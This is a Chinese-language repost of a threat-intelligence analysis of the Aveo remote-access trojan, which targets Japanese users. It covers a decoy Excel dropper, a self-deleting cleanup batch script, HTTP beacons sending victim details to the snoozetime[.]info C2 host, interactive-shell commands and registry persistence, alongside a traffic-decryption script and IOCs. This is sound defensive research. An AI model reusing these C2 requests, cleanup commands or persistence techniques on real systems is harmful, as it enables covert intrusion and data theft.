Aveo惡意軟件分析。Palo Alto Networks 發現了一個名為 Aveo 的惡意軟件家族,它針對日語用戶開發。Aveo 的名字來自于其二進制文件中的嵌入式調試字符串。Aveo 惡意軟件家族與 ForrmerFirstRAT 惡意軟件家族有密切的聯系,二者都針對日語用戶。Aveo 會偽裝成 Microsoft Excel 文檔,并在執行時拋出誘餌文件。誘餌文檔與埼玉工業大學 Ido 實驗室的研究有關。執行后,Aveo 可以接收多種命令,這將允許攻擊者完全控制感染主機。
部署
Aevo 的樣本會偽裝成 Microsoft Excel 文檔,如下圖所示。值得注意的是,malware.exe 只是一個占位符,原文件名未知。
該可執行文件其實是一個 WinRAR 的自解壓可執行文件,它會在執行時拋出誘餌文檔和 Aveo 木馬來運行。下圖就是拋出的誘餌文檔,在運行之后打開:
這個誘餌文檔是關于 Ido 實驗室 2016 年研究立項的信息。該文件列出了 16 名參加 CAVE 的名單,包括名字、單位以及郵件地址。這個文檔用日語書寫,文件名也是日文 CAVE研究會參加者.xls,這些都表明該惡意軟件是針對日語用戶的。此外,Aveo 和 FormerFirstRAT 家族的相似性將會在稍后討論,這個討論將進一步支持該惡意軟件是針對日語用戶的。
基礎設施
Aveo 木馬配置了以下域名來進行 HTTP 通信:
snoozetime[.]info
jack.ondo@mail.com 最早在 2015 年 5 月就注冊了,自那時起,該郵箱已經和以下三個 IP 地址關聯上了:
104.202.173[.]82
107.180.36[.]179
50.63.202[.]38
所有這些 IP 地址都位于美國境內。
從 snoozetime[.]info 的 WHOIS 信息來看,注冊郵箱為jack.ondo@mail[.]com,注冊名為aygt5ruhrj aygt5ruhrj gerhjrt。根據這兩條線索進行拓展:
bluepaint[.]info
coinpack[.]info
7b7p[.]info
donkeyhaws[.]info
europcubit[.]com
jhmiyh.ny@gmail[.]com
844148030@qq[.]com
惡意軟件分析
在自解壓可執行文件運行后,一系列的文件釋出到文件系統中,其執行流如下:
當 mshelp32.exe 可執行程序運行時,首先讀取setting32.ini 文件,其中包含著誘餌文檔的名字。這一信息被用來構建一個批處理腳本,如下:
@echo off
copy "CAVE研究會參加者.xls" "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls" /Y
del "CAVE研究會參加者.xls" /F /Q
del mshelp32.exe /F /Q
del setting32.ini /F /Q
del "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe" /F /Q
del %0 /F /Q
該批處理腳本在一個新的進程中執行,在 Aveo 運行、誘餌文檔釋放后執行清理工作。
Aveo 惡意軟件家族
Aveo 惡意軟件會在開始運行一個安裝程序,該程序會復制自身到以下位置:%APPDATA%\MMC\MMC.exe如果因為某種原因,%APPDATA%\MMC 目錄不能被創建,Aveo 將會使用 %TEMP% 來代替 %APPDATA%。惡意軟件自身復制完成后,將會在新的進程中以原文件名為參數執行 MMC.exe。當執行時,如果提供了這單個參數,惡意軟件將會刪除掉制定路徑內的文件。安裝完成后,Aveo 將會提取以下受害人信息通過 HTTP 傳到遠程控制服務器上:
Unique victim hash
IP Address
Microsoft Windows version
Username
ANSI code page identifier
這個信息被送到 snoozetime[.]info上,像下面的 HTTP 請求樣例:
GET /index.php?id=35467&1=ySxlp03YGm0-&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g-- HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Cache-Control: no-cache
惡意軟件使用了 RC4 來對數據進行加密,使用 hello作為密鑰。如下圖所示,Aveo 和 FormerFirstRAT 的加密部分幾乎是相同的,只s是算法和密鑰變了。
可以通過以下代碼來解密 HTTP 中傳輸的數據:
import base64
from binascii import *
from struct import *
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt
CALG_RC4 = 0x6801
CALG_MD5 = 0x8003
def decrypt(data):
md5_hasher = CryptCreateHash(CALG_MD5)
CryptHashData(md5_hasher, 'hello')
generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)
decrypted_data = CryptDecrypt(generated_key, data)
return decrypted_data
for a in 'index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A--&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--'.split("&")[1:]:
k,v = a.split("=")
decrypted = decrypt(base64.b64decode(v.replace("-","=")))
print "[+] Parameter {} Decrypted: {}".format(k, decrypted)
運行以上代碼會產生以下結果:
[+] Parameter 1 Decrypted: e8836687
[+] Parameter 2 Decrypted: 172.16.95.184
[+] Parameter 4 Decrypted: 6.1.7601.2.1
[+] Parameter 5 Decrypted: Josh Grunzweig
[+] Parameter 6 Decrypted: 1252
在得到受害者信息后,惡意軟件會按照預期返回 OK。之后 Aveo 將會產生一個新的線程來負責處理 C&C 服務器的命令,以及請求產生的交互式 Shell。Aveo 對注冊表進行以下設置,以指向惡意軟件的路徑,從而保證重新啟動后惡意軟件仍然可以持久工作:HKCU\software\microsoft\windows\currentversion\run\msnetbridge然后命令處理程序進入輪詢等待,Aveo 會從 C&C 服務器接收命令。雖然 Aveo 在等待響應,它也會執行隨機延遲,延遲時間在 0 到 3276 毫秒之間。如果 C&C 服務器返回 toyota,會將間隔設置為 60 秒。Aveo 可以接收以下命令:
1.執行交互 Shell 命令
2.獲取文件屬性
3.寫入文件
4.讀取文件
5.驅動器列表
6.對路徑執行 DIR 命令
以下請求顯示了 C&C 服務器發送 ipconfig 命令到 Aveo 的過程:
C&C 請求
GET /index.php?id=35468&1=niBo9x/bFG4- HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 11
Server: Werkzeug/0.11.10 Python/2.7.5
Date: Wed, 10 Aug 2016 16:00:11 GMT
\xca89\xb4J\x82B?\xa5\x05\xe8
[Decrypted]
1 ipconfig
Aveo 響應
POST /index.php?id=35469&1=niBo9x/bFG4- HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Content-Length: 1006
Cache-Control: no-cache
\xca\x38\x39\xb4\x4a\x82\x42\x3f\xa5\x05\xe8\xdb\xda\x74\x8b\x79\x39\x46\xf2\x42\x1f\xcd\x39\xf3\x65\x1d\xda\x49\x40\x6c\x5e\x6e\xab\x79\xc2\x44\xc3\xb0\x12\xfd\xe2\x84\x67\x0d\xa5\xd3\x50\x2d\x1c\x31\x4a\x9e\xcb\x3d\x08\xe6\x1b\x04\x85\xbf\x11\x0e\x96\x63\xcf\x71\xfe\xe4\x97\x2a\xdc\x12\x23\x4d\xcb\x0f\x93\x30\xbc\xa0\xc8\x4e\x4e\xd8\xdb\x33\xa2\xbe\xff\x5e\x89\x22\xb9\x16\xd1\xf0\x60\x71\x64\x7a\x10\xb8\x78\x76\xe5\x08\x90\x46\x30\xa3\xe2\x4e\xdc\x98\x11\x27\x62\x38\x00\xb4\x54\x6d\xd7\x5b\x19\x5f\x19\xb8\xd1\xf5\xc1\x9b\x97\xda\x84\x2c\xdd\x2d\x97\x0a\x69\x51\xd9\x31\x77\x4a\xe2\x7f\x5e\xc5\xaf\x02\x3c\x69\x9c\x5f\x94\x3e\x0c\x25\xce\x63\xa9\x43\xff\x34\x25\x42\x95\xa9\x1f\xaa\xdf\x2b\xa7\xb1\xc0\x3
[Truncated]
[Decrypted]
1 ipconfig
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
[Truncated]
結論
Aveo 與 FormerFirstRAT 在多個特征上都是一致的,包括加密模塊、代碼重用和 C&C 功能。正如前面討論的 FormerFirstRAT 樣本,這個惡意軟件家族看起來也是針對日語用戶。使用自解壓文件的 WinRAR 釋放誘餌文檔和 Aveo 的惡意軟件副本以及清理腳本。Palo Alto Networks 的客戶已經免受以下威脅:
1.AutoFocus 已經對這種威脅創建了跟蹤和監控
2.WildFire 歸類 Aveo 到惡意程序
3.C&C 域名列入 Threat Prevention 攔截黑名單
IOC
SHA256 哈希
9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2
8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d
C&C 域名
snoozetime[.]info
注冊表鍵值
HKCU\software\microsoft\windows\currentversion\run\msnetbridge
文件路徑
%APPDATA%\MMC\MMC.exe
%TEMP%\MMC\MMC.exe
看文倉www.kanwencang.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20170107/83079.html
文章列表
留言列表
